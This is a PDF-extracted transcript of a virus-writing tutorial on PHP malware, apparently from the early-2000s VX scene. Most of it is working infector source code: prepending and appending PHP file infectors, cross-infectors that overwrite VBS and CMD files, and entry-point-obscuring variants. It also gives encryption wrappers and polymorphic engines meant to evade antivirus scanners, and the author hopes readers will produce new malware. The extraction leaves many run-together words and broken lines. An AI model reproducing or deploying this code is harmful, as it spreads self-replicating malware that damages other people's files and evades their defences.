creacion de virus en php
TRANSCRIPT
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 1/21
Index:******
0) Intro Words
1) File infectiona) Prepending
b) Appendingc) Cross Infection
i) VBS infectionii) JS infectioniii) CMD infection
d) Entry Point Obscuringi) Include the virus after a commandii) Useing a function of the victim
2) Encryptiona) Changing virus to ASCIIb) Useing an intern decryption function
c) Useing changed character string
3) Polymorphisma) Adding Trashb) Change Variable Namesc) Number Changing
4) Other Thoughtsa) Find more filesb) Changing the commands
5) Last Words
0) Intro Words
PHP, abbreviate: 'Hypertext Preprocessor', is a very common script languagefor the world-wide-web. You're possible to do nearly everthing internetrelated with that language. That means, you're also able to make virusesfor it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done inOctober 2000, and was released in 29A#5. It was no real virus, moreovera companion. It writes to every PHP-file in the current directory a line,which let the victim run the virus. But the host doesn't contain the virus.After searching something about PHP viruses I found out that there is no
high-tech PHP virus so far out, because all the virus I could find are ripsof PHP.Pirus (useing the same prinzip). That was my inspiration in writingsuch an article. I wanted to make something totally new, and I guess I hadsuccess. I tested every source with PHP 4.3.3, and everthing worked fine.Now go on reading this and learn something about PHP viruses! :)
1) File Infection
That's maybe the most important thing, when you want to make a PHP virus,therefor I want to explain you, how you can infect files with PHP. It shoul
dbe no problme to understand the examples, because I tried it to make assimple as possible. When the article was written (autumn 2003), there was
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 2/21
no real file infector out there. The only interesting PHP virus so far isMaskBits' PHP.Pirus, which don't infect files, but use the command 'include
'that the virus is executed in every PHP file in the current dir. You may th
ink'Why does he tell me this?". I don't know, just for fun :). Now let me expl
ain
you how to infect files.
a) Prepending
A prepender copies it's code infront of the victim's code, therefor it will
be executed before the victim. That's the main idea of this kind of infection.
But there are some other important things you have to note: To get the virus
out of the file, you need any information about where the virus is. In myexample the virus uses the first 391 bytes. Next important thing is, tha
t youmust not infect a file two times. What do to against that? Check, if the
fileif already infected. In the following example the virus searchs in the f
irst13 bytes (in an infected file it's this code: '<?php // SPTH') if there'
s a'SPTH'. If yes, the file won't be infected. OK, I think, you understood.
Nowlet's look at the PHP Prepender Virus example:
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - -- -<?php // SPTH$string=fread(fopen(__FILE__,'r'), 391);$curdir=opendir('.');while ($file = readdir($curdir)){if (strstr($file, '.php')){$victim=fopen($file, 'r+');if (!strstr(fread($victim, 13), 'SPTH')){rewind($victim);fwrite($victim, $string.fread($victim, filesize($file)););
}fclose($victim);
}}closedir($curdir);?>- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - -- -
As this is a real easy virus, you should understand it quickly while loo
kingat it. Now i'm going to give you the most important things the example d
oes:
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 3/21
--> Reading the first 391 bytes (which is exactly the virus size)
--> Searchs for every .PHP file in the current directory
--> If not infected, reading the victim
b) Appending
An Appender is a virus, which copies itself after the victim file. It'sreally easy to make one. You just have to search the last php-part (orjust make a infection-mark at the begin of the virus. Then you read tillthe end, and you have your virus-file. The rest should clear: Search a
victim, check if not infected and copy the virus-body in the end of thefile. I made an exaple for that, as you migth think. The exact explanation
will be in the end after the code.
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - -- -<?php // SPTH$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');$curdir=opendir('.');while ($file = readdir($curdir)){
if (strstr($file, '.php')){$victim=fopen($file, 'r+');if (!strstr(fread($victim, filesize($file)), 'SPTH')){fwrite($victim, $string);
}fclose($victim);
}}closedir($curdir);?>- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - -- -
I've already explained how the prinzip works. Now I'll explain you my example:
--> Opens the infected file, and save the virus body (searching for 'SPTH', and
save the rest of the file)
--> Searchs for every php-file in the current directory.
--> Checks is not infected (searchs for the infection mark 'SPTH' anywhe
re inthe file. If not found: Not infected
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 4/21
--> Copies the virusbody to the file
c) Cross Infection
Cross Infection means infecting more than one file extansion. That's really
useful, because the virus will spread much faster. That was my inspiration
in writing this. I found some nice ways how to infect other file-formats,
therefor I want to show you them. The biggest problem while coding thesethings was, that you can't execute a .php file directly, but with an Int
ernet
Browser. Fortunatly Microsoft make it possible to open the Internet Explorervery easiely. :)
i) VBS infection
It's really easy to infect a vbs-file, because the only important thing
if you want to write such a cross infector is, that you don't have touse
the sign [" = chr(34) ], because VisualBasicScript uses it for strings, and
since our whole code is a string in the VBS-file, there would be an error.
Now look at the example, and try to understand (shouldn be too difficult,
because I made it very easy to read).
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -<?php$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.chr(13).chr(10);$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);while ($string && $string!='?>'){$vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);$string=strtok(chr(13).chr(10));
}$vbscode.='virus.WriteLine('.chr(34).'?';$vbscode.='>'.chr(34).')'.chr(13).chr(10);$vbscode.='virus.Close()'.chr(13).chr(10);$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);$directory=opendir('.');
while ($file = readdir($directory)){if (strstr($file, '.vbs'))
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 5/21
{fwrite(fopen($file, 'w'), $vbscode);
}}closedir($directory);?>- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
It should be totally easy to understand this example. Anyway, I'll give
you the main ideas of the little code:
--> Splits the php-code (=virus) into lines [chr(13).chr(10)]
--> Makes a vbs code, which generates a new HTM-file containing the virus
--> Adds every line to the VBS (as string, so it will be written to the
HTM-file, which will be generated by the VBS [?!?! :D])
--> After finishing the VBS-code, it searches for every .VBS in the current
directory and overwrites it with the code, which we made before.
ii) JS infection
Infecting a JavaScript file is nearly the same as infecting a VBS file, therefore
I won't give you an example. The reason for this is, that we're using WScript in
VBS and JS. The only thing you have to do is to change the 'set' to'var', and the
'.vbs' to '.js', but i guess, you know that :D. I tried it, and it worked fine.
iii) CMD infection
This was the most difficult file extansion, which I made for this article. The
reason is easy to explain: CMD = Batch for WinNT/00/XP = DOS. And as you know
you are NOT allowed to use any '>', '<' or '&' in a DOS-string. ButI solved the
problem, as you may imagine ;). I used the characters in every stri
ng instead ofthe read signs. Than I had 2 more problems: The begin and the end o
f the PHP code,
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 6/21
where we MUST write '<' or '>'. So I thougth about that, and suddenly a idea came
to my mind: I'll use a JavaScript file, to write the first and thelast line to
the .htm file. And since I have to use a script anyway for startingthe Internet
Explorer (to run the PHP-code - DOS can't open a Internet Browser),
I used that file.The result of my coding is the following file :D. I'll explain the
main-ideas moreexactly after the source.
- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -<?php$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));$string=strtok(chr(13).chr(10));$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);while ($string{0}!='?')
{ $cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);$string=strtok(chr(13).chr(10));
}$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).'file.js'.chr(13).chr(10);$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.
fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);$cmdcode.='cscript file.js';
$directory=opendir('.');while ($file = readdir($directory)){if (strstr($file, '.cmd')){fwrite(fopen($file, 'w'), $cmdcode);
}}closedir($directory);?>- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -
Now the shourt explanation of the code:
--> Reads the whole file content (the virus), and splits it to lines
--> Makes the .CMD code, which don't contain any '>','<' and '&' (that
was the problem I wrote before)
--> Adds a JavaScript code to the .CMD code, so the first and the l
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 7/21
ast lines('<?php' and '?>') will be added to the new .htm file.
--> Adds a code to the .CMD code, which runs the indernet-explorer
--> Overwrites every .CMD file in the current directory with the CMD-code.
d) Entry Point Obscuring
This is a really important technique in virus-writing. Maybe some of youdon't know, what EPO exactly is. So I'll explain you: An AV-program sear
chs
in most cases at some static offsets for the virus (maybe at the begin orat the begin). To fake them, we have to use a variable adress of the vir
us,and don't use any jump or call to the virus at a static adress. How coul
d wedo this? I'll show you a short 'grafic'. At this point I want to thankSnakeByte for his Perl-EPO article [released in 29a#6] for the idea, how
to make a EPO virus in a script language. So, here is the grafic:
[ part of the victim file ]information about the address
read xxx lines of the virusopen PHP file
read yyy linesinsert the virusread rest
close PHP file[ rest of the victim file ]
Now we have another problem: Where to include the virus-code in the host-file?
SnakeByte did it searching for ';', which is the end of a Perl command.As
you meigth know, also PHP statments ends with a ';'. Than I thought about an
other way, which could be also done, since that technique could be destruction
of the victim-file. Than i got an idea: including the code to an function.
how i exactly mean this, I'll show you after the ';'-example.
i) Include the virus after a command
As I already told you, this idea comes from SnakeByte. To include a virus
after a command, you have to search for a ';', which is the end of every
PHP statement. That seems to be everything. Now let's have a look at
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 8/21
theexample for this EPO technique.
- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -<?php$ln=16;$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);fseek($filehandle, $ln);$content=fread($filehandle, 987);fclose($filehandle);$curdir=opendir('.');while ($file = readdir($curdir)){if (strstr($file, '.php')){$victim=fopen($file, 'r+');$vicont=fread($victim, filesize($file));if (!strstr($vicont, 'SPTH'))
{ $possible=0; $c=0;while($c<filesize($file)){if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $
possible++;}$c++;
}$which=rand(1,$possible); $c=0; $i=0;while($which){if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $
which--; }
$c++;}rewind($victim);$a=fread($victim, $c); $b=fread($victim, filesize($file));fclose($victim);fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10)
.$content.chr(13).chr(10).$b);}
}}?>- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -
This is an example for the EPO technique, which I descript above. It's quite
easy to understand, anyway, I'll tell you how the virus works exactly:
--> Searchs itself in the host file and reads the next 987 bytes.
--> Opens a .php file
--> Checks how many possible entry points the virus has
--> Find one Entry Point randomly
--> Reads the code before the EP and the code after it
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 9/21
--> Writes the code before, the virus code and the code after the entry
Point to the file
ii) Using a function of the victim
This technique is maybe little bit better than the other one. But infact
I've seen this type of EPO in any script virus (ok, I haven't seen really
many EPO script viruses :D). I've already told you, that the virus will
use a function by the host file. But maybe you don't really understa
nd, what I mean, therefore I'll show you, what I mean. Here you can seea
non-infected file and an infected file. Hope that help you to get the
point of the idea:
Normal File: Infected File:_________________________ _________________________ HOST-CODE-1 HOST-CODE-1 call to function() call to function() HOST-CODE-2 HOST-CODE-2 function() function()
HOST CODE-3 < < VIRUS > > end function call to real funtion HOST-CODE-4 end function _________________________ HOST-CODE-4
real function HOST CODE-3 end real function _________________________
Now you should understand, what I mean, but how to manage this? First you
have to search for every function in the code than you use on of them, save
the victim's function code and copy the virus code to the function.After
the virus code you need a call to a real function, which you can addin the end of the file. The name of the real function is no problem,since your code call it. Now I also made an exaple for this techniqu
e, asyou may imagine. Look at it, and try to understand. The techniqual d
escriptionwill follow after the code:
- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -<?php
$ln=16;$filehandle=fopen(__FILE__,'r');srand((double)microtime()*1000000);
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 10/21
fseek($filehandle, $ln);$content=fread($filehandle, 1611);fclose($filehandle);$curdir=opendir('.');while ($file = readdir($curdir)){if (strstr($file, '.php'))
{$victim=fopen($file, 'r+');$vicont=fread($victim, filesize($file));if (!strstr($vicont, 'SPTH')){$possible=0; $viccont=$vicont;while(strstr($viccont, 'function ')){$viccont=strstr($viccont, 'unction ');$possible++;
}$which=rand(1,$possible);
$viccont=$vicont;while($which--){$viccont=strstr($viccont, 'function ');
}$viccont=strstr($viccont, '{');$before=strlen($vicont)-strlen($viccont)+1; $check=0; $i=0;do{if ($viccont{$i}=='{') { $check++; }if ($viccont{$i++}=='}') { $check--; }
}while($check);
fseek($victim, $before);$funccont=fread($victim, $i+1);fseek($victim, $before+$i-1);$aftercont=fread($victim, filesize($file)-$before-$i-strlen(strstr($vicont
, '?>')));$coundj=0; $newvar='';do{$newvar.=chr(rand(97,122)); $countj++;
}while ($countj<rand(5,15));rewind($victim);$beforecont=fread($victim, $before);rewind($victim);fwrite($victim, $beforecont.chr(13).chr(10).'$ln='.($before+strlen($before
)+9).';'.chr(13).chr(10).$content.chr(13).chr(10).$newvar.'(); }'.$aftercont.chr(13).chr(10).'function '.$newvar.'() {'.chr(13).chr(10).$funccont.'?'.'>');
}}
}?>
- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -
To understand this code, you must not be a beginner. :) I worked abo
ut 4-5hat this little thing. Anyway, it works really fine and I want to tel
l you,
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 11/21
how it works:
--> Searchs for the virus itselfs via a variable called '$ln', whichcontains
the information, where the virus is in the file. The variable have to
be new generated every virus run, since the virus is at differen
t placesevery generation. It contains the Entry Point in bytes.
--> Searchs for a .PHP file, which are not already infected
--> Searchs for 'function ' in the victim, to get the possible new entry points
--> Find one Entry Point randomly
--> Searchs for the content, which is before the founden function
--> Searchs for the funtion-content
--> Searchs for the content, which is after the founden function
--> Makes a new function, with a random name, and include the function-content
--> Writes the beginn-content, the function with the virus content,a call to the new
function (which contains the real host-code), the after-content,and the new function
with the whole content from the function.
2) Encryption
The first part of the article should give you the idea, how to write a success-
ful virus in PHP. But more or less, these techniques are easy to detect forAnti-Virus companies. Therefore I also want to show you, how to fake them.
This(and of corse the next part: Polymorphism) of the article should help you t
owrite a PHP virus, which can not be detected by simple string scan or just
todecrease scanstrings. I found many different kinds to crypt a PHP string, a
nd ofcorse, I want to tell them to you :)
a) Changing virus to ASCII
Using the whole virus into characters should not be a big problem. To ex
ecutethe code in character I thought about 'eval()'. But after 2h of testing
I
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 12/21
saw that it don't work. So I had to think of another way: Include the virus-
code (written in ASCII) to a new file, run the file via 'include()', anddelete
it. Therefor I made an example, which shows, how you may use the technique:
- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - -- -<?php$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).
chr(32).chr(115).chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62);copy(__FILE__,'file.php');$a=fopen('file.php','w+');fwrite($a, $content);fclose($a);
include('file.php');unlink('file.php');?>- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - -- -
You should understand the prinzip of the code really fast. The encrypt code
contains a 'secret' message. :) I'll show you, how it works, if you haven't
understand it so far:
--> '$content' contains a PHP script in ASCII form. Here you should useyour virus
code. Just making ASCII of the normal letters, and add them to a variable.
NOTE: Since the encrypt data should be a fully workable file, you have to
add '<?php','?>', and the whole PHP syntax (for instands semikolons).
--> Makes a new file (because I couldn't find a command to make a file,I copies
'__FILE__', and overwrites it.
--> Writes the encrypt content to the file (but now: unencrypt!)
--> Opens the file (via 'include(<-file->)')
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 13/21
--> Deletes the file (via 'unlink(<-file->)')
b) Useing an intern decryption function
This head-line sounds strange. Well, it isn't :). The basic of the ideais
this one: You call a function with 3 values, and get the right sign back.
The idea isn't hard to understand. I used the same prinzip as at the last
example. The only differents is the encryption: Now I use a function-call
instead of a real sign. But because the function calculates the right sign,and returns it, it's no problem. I hope, that you understand it. Now let
'shave a look at my example for this techique:
- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - -- - -<?php$content=cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
cr(225,215,2).cr(21,42,1).cr(302,240,2);copy(__FILE__,'file.php');$aa=fopen('file.php','w+');fwrite($aa, $content);fclose($aa);include('file.php');unlink('file.php');
function cr($a,$b,$c){if ($c==1) { return(chr($a+$b)); }if ($c==2) { return(chr($a-$b)); }if ($c==3) { return(chr($a/$b)); }
}?>
- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - -- - -
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 14/21
Well, you should have understand what I meant, when you looked at the code.
I'll show you, what it does exacly. The encrypt code is a secret messageagain :)
--> Every sign is a call to the function with 3 values. The first and the second
value are the numbers, the third value is just the information, which
calculation the function will have to do (+,-,/), something like thekey.
--> After getting every sign, the code will do the same as the code above.
c) Useing changed character string
This technique is a well-known one in script languages. For instands jackie
did it in JavaScript. Therefore I thought that it should also be able make it
in PHP. And as you can see, it was able. The technique works as follow:The
(virus-) code is encrypt in a variable. It's encrypt via adding 3 (the key) to
the ASCII of every character. Should be easy to understand. Now let's lo
okat the example I made:
- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - -- - -<?php$all='?Bskssulqw+*111frro/#wklv#lv#wkh#wklug#hqfuswlrq#whfkqltxh#dqg#rx#duh#vwloo#zlwk#ph111#=,*,>BA';$i=0; $content='';while($i<strlen($all)) { $content.=chr(ord($all{$i++})-3); }copy(__FILE__,'file.php');$aa=fopen('file.php','w+');fwrite($aa, $content);fclose($aa);include('file.php');unlink('file.php');?>- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - -- - -
The encrypt variable-content contains the code of a PHP file writing a message to
the screen. The rest works as always: Makeing a new file, and overwrite
them withthe decrypt code, execute the file, and delete it. How the en/decryption
works I'll
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 15/21
show you:
--> Changes ever character of the encrypt string to ASCII numbers (via 'ord()')
--> Decreases the number with the key (which is 3 in this sample)
--> Changes the number back to characters (via 'chr()'), and you got thereal string.
3) Polymorphism
As everybody knows, this is one of the most important techniques to fake AV
s and to show, that you know, what you're doing :). So I desided also to write
something about this technique here. In fact, I've never seen any other poly
PHP virus around the world (maybe it exists anyway). It was really easy forme to write some poly-engines, because PHP isn't a really difficult languag
e.I tried my best to show you, how a PHP poly engine could work.
a) Adding Trash
This technique is a well-known in many script languages. Therefor I tought, it
should also be possible in PHP. Then I sat down, and began to write. About 2h
later (with smoking-breaks, sure :D), I had the finished code. First I want
to tell you, what kind of trash/junk/garbage I included in my example:
- // shsdfjksfdjfds
- $kasjkh=192847832;
- $lwekjcmws='iwsdkjhfskjbnla';
Well, now we know, what to include. Anything else to do? Sure, we have to delete
the trash again, oterhwise the file would have 2MB after the 10th time you run it,
and I think, you don't want that. :) So, how to delete trash? In my example I searched
the first letter of a line, and checked, if it's a '/' or a $'. If yes,it's trash
and we don't have to include it to our new code. It seems I explained everthing.
Now let's have a look at the code:
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - -- - -
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 16/21
<?php$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));$newcont='<?php'.chr(13).chr(10);srand((double)microtime()*1000000);while ($string && $string!='?>') {if(rand(0,1)) {if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }}$string=strtok(chr(13).chr(10));if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }fwrite(fopen(__FILE__, 'w'),$newcont);
}
function trash($var) {do { $var.=chr(rand(97,122)); } while (rand(0,7));return $var;
}?>- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - -- - -
Everthing should be clear now, anyway, I'll tell you the most importantthings in this
code-snip:
--> It splits the whole filecontent of the virus ('__FILE__', as it's called in PHP)
to lines (chr(13).chr(10)).
--> One in two, if the last line wasn't a trash, it adds a trashline.
--> If the last line was no trashline, it adds the line to the new content
--> It writes the new content to the file
b) Variable Changing
This is another well-known script technique to morph the virus. So I didit again in PHP.
Let's explain the technique. You're useing many varibles in a virus, andif the variables
have the same name every generation, our friends the AV-guys are able touse this fact to
detect the virus. So it could be of much value to change the variable-names. How I did it?
I used an array with all my varibale, which i'm using. Than I searched for every value from
the array in the virus-file (=i searched for every variable), and replaced it via the command
'str_replace' and used a new one, which got by my 'trash-function'. Now
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 17/21
let's look at thesource of the example:
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - -- - - - -<?php$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash'
);srand((double)microtime()*1000000);$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));$counti=0;while($changevars[$counti]) {$content=str_replace($changevars[++$counti], trash('',0), $content);
}fwrite(fopen(__FILE__,'w'),$content);
function trash($newvar, $countj) {do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));return $newvar;
}?>- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - -- - - - -
Easy code, easy to understand. Anyway, let me tell you, how it exactly works:
--> Makes a new array with all variables and function-names
--> Gets the whole content of the virus-file
--> Replaces every element of the array in the content, and use a new on
e.
--> Writes the content back to the file
c) Number Changing
Every code contains any numbers, whatever this number does. After thinking a little bit
I found out, that I can change the numbers too. So I desited to make a PHP code, which
changes the numbers in it's code. How can we change a number, you may think. It's really
easy: You make a calculation with that number, which returns the numberyou want.
Let's have a look at the possible variants:
--> 10=(12-2)
--> 10=(8+2)
--> 10=(80/8)
I also tried to use div, but there are comma-numbers, which don't really
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 18/21
work. But it's noproblem, there are enought variants with just 3 calculation types. Now I
'll show you, how anumber could be after the 4th morphing:
--> 10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))
Now I hope, that you know about the damn cool results of this technique:)
After explaining the main-thing, I'll show you the little code, who changes the numbers.
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - -- - - -<?php$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));srand((double)microtime()*1000000);$count=-1; $number='';
while(++$count<strlen($newcont)) {if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {$number=$newcont{$count};while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$ne
wcont{$count}; }$remn=rand(1,10);switch(rand(1,3)) {case 1:$cont.='('.($number-$remn).'+'.$remn.')'; break;
case 2:$cont.='('.($number+$remn).'-'.$remn.')'; break;
case 3:$cont.='('.($number*$remn).'/'.$remn.')'; break;
}}$cont.=$newcont{$count};$number='';
}fwrite(fopen(__FILE__,'w'),$cont);?>- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - -- - - -
Now a shourt explanation about the code:
--> Reads everything from the file
--> Searchs for a number in every sign [sign>chr(47) && sign<chr(58)]
--> Reads the rest of the number
--> makes a new calculation with that number
--> Writes the new content to the file
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 19/21
4) Other thoughts
When I wrote this article, some other ideas came to my mind, thereforeI also what to give the ideas to you. Maybe that some of the ideas arejust non-sense or other are brilliant (I don't think so, but wonder happens:D ). OK, let's start: This part contains ideas for better hideing to don'tbecome detected, or how to spread faster. I hope, you also like to read thi
s!
a) Find more files
What must we do if we want to find more files? Search in more directories. :)
My idea is this one: Since the command 'getcwd()' returns the current dir,
we are able to infect also every root-directory. How to do this? Look atthe
return-value of 'getcwd()':
--> E:SPTHProgrammeminixampphtdocs
Now we have 4 directories, which aren't infected so far:
~~ E:SPTHProgrammeminixampp~~ E:SPTHProgramme~~ E:SPTH~~ E:
And how to get the directories? Just searchs for a '' in the current dir, than
delete character by character, till you have a ''. Than you have the dir
ectory-name. The rest is easy: Open it via 'opendir()', and do the same as I tr
ied toexplain you :)
b) Changing the commands
Maybe you already know it, but PHP contains tons of aliases for different commands
and we can use that. I'm sure you know how :) Just replace one commandwith another,
which is doing the same. I made a list of commands and it's aliases, toshow you,
how much we are able to change. This is just a short list, neverthelessit could
be useful, when you want to make such a polymorphism virus.
chop - rtrim()close - closedir()
die - exit()dir - getdir()doubleval - floatval()
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 20/21
fputs - fwrite()ini_alter - ini_set()is_double - is_float()is_integer - is_int()is_long - is_int()is_real - is_float()is_writeable - is_writable()
join - implode()magic_quotes_runtime - set_magic_quotes_runtime()pos - current()rewind - rewinddir()show_source - highlight_file()sizeof - count()strchr - strstr()
Get the full list of aliases here: http://zend.com/phpfunc/all_aliases.php
5) Last Words
Comming to an end I want to say that I had really much fun while discovering this language,and I also hope, that you learned some things. I hope, that I will see many ne
w and good PHPmaleware in near future. If I don't see any, I know, that I worked 2-3 month f
or nothing. :)
But let's see it positiv: Now it's easy to write strong viruses for this language, becausethe techniques are already discovered. Here at this point I want to thank Mask
Bits/VXI formaking the first PHP maleware called PHP.Pirus, which were released in 29a#5.
This inspiredme in writing this article, because I found out, that the current PHP viruses
are not atthe point where you can say: "It's perfect, we can't make it better." :). Anot
her guy I wantto thank is SnakeByte, because of his articles about Perl poly/EPO/encryption
in 29a#6. Ithelped me in some parts of this article. Greets goes also to Kefi, who wrote a
lso a PHP-poly-morphic virus, which I haven't seen so far. The fact that I know that made me
very activ inwriting this article :). Now I want to send some greets and thanks out to the
world, becauseI think that I said everything, what is important:PhileT0aster and the rest of the rRlf-gang ;), jackie for being something likean idol for me,SlageHammer & Knowdeth - the most friendly VX guys i know :), VirusBuster - fo
r answering mystupid questions every time, Vorgon - for trying to teach me assembler :D, Tor
o - for helping
me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - for beeing a greatguy, VorteX & Worf for being the first guys who helped in the VX-world :), VxF
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 21/21
& Metal forthe great fun in IRC :), Doctor Rave for some great ideas you gave me, prizzy
for the nice emailyou wrote, herm1t for hosting my homepage, sinocred for hateing the '<SPTH> hi
' :D, PanoiX forbeing a cool guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte f
or cool talks in
